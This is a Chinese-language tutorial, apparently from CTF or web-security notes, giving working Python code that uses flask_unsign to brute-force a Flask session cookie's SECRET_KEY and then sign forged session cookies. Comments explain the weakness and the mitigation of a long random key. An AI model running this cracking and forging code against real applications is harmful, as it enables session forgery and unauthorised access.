用 flask_unsign 爆破 Flask 的 cookie 或 session(Flask 的 session cookie 只用 SECRET_KEY 签名、不加密,密钥过弱时可以被字典离线猜出)
安装:
python -m pip install flask_unsign
python -m pip install flask_unsign_wordlist
爆破cookie得到签名密钥(SECRET_KEY):
from flask_unsign import Cracker, logger, DEFAULT_WORDLIST
from flask_unsign.helpers import wordlist
# Signed Flask session cookie: three dot-separated segments. The first segment
# is base64url JSON ({"username":"guest"} here) and is readable without the
# key; only the trailing signature depends on SECRET_KEY.
cookie = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4"

# Uses the default salt; `threads` is the number of worker threads.
crack = Cracker(value=cookie, threads=8)

# The search can only succeed when the application's SECRET_KEY is one of the
# candidates. A long random key (e.g. secrets.token_hex(32)) is not in any
# wordlist, which is the mitigation for this whole technique.
with wordlist(DEFAULT_WORDLIST) as candidates:
    crack.crack(candidates)

found = crack.secret
if found:
    # crack.attempts is the number of candidates that were tried.
    logger.success(f"Found secret key after {crack.attempts} attempts")
    # The recovered key is bytes. errors="ignore" drops bytes that are not
    # valid UTF-8, so for such a key the decoded text would differ from the
    # real key.
    secret_key = found.decode("utf-8", errors="ignore")
    print("SECRET_KEY:", secret_key)
# wordlist(DEFAULT_WORDLIST) 中的 DEFAULT_WORDLIST 可以换成任意字典文件的存储路径
# wordlist(DEFAULT_WORDLIST) 整体也可以换成一个可迭代对象,例如一个生成器:
# candidates = (str(i).encode() for i in range(1, 1000))
# crack.crack(candidates)
# 爆破得到的密钥原始为字节串(bytes),需要解码
利用爆破出来的密钥(SECRET_KEY)生成新的cookie
from flask_unsign import session
# Session contents to sign; this is the same payload the original cookie holds.
payload = {"username": "guest"}

# Signing needs nothing but the secret: the server-side integrity of every
# session field rests on SECRET_KEY staying unknown. `secret_key` is the value
# recovered in the cracking step.
sec_session = session.sign(value=payload, secret=secret_key)
print(sec_session)
# secret 若无特殊要求,值应为上一步从 cookie 爆破得到的密钥
# sec_session 的值即签名后的 cookie,可放入请求头中
完整流程:
from flask_unsign import Cracker, logger, DEFAULT_WORDLIST
from flask_unsign.helpers import wordlist
from flask_unsign import session
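# Signed Flask session cookie; its first segment is the base64url JSON payload
# {"username":"guest"}, and the last segment is the signature made with
# SECRET_KEY.
cookie = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4"
crack = Cracker(value=cookie, threads=8)  # uses the default salt

# Candidate keys as bytes: the 1000 decimal strings "233000" .. "233999".
# A key drawn from a space this small is found by plain enumeration; a long
# random SECRET_KEY (e.g. secrets.token_hex(32)) removes that possibility.
inex = (str(i).encode() for i in range(233000, 234000))
crack.crack(inex)

if crack.secret:
    logger.success(f"Found secret key after {crack.attempts} attempts")
    # The recovered key is bytes; the candidates here are ASCII digits, so the
    # decode is lossless even with errors="ignore".
    secret_key = crack.secret.decode("utf-8", errors="ignore")
    print("SECRET_KEY:", secret_key)

    # Sign only once a key has been recovered: with the signing step at top
    # level, `secret_key` is undefined after a failed search and the script
    # stops with a NameError instead of reporting the result.
    sec_session = session.sign(
        value={"username": "guest"},
        secret=secret_key,
    )
    print(sec_session)
else:
    # No candidate reproduced the cookie's signature.
    print(f"SECRET_KEY not found after {crack.attempts} attempts")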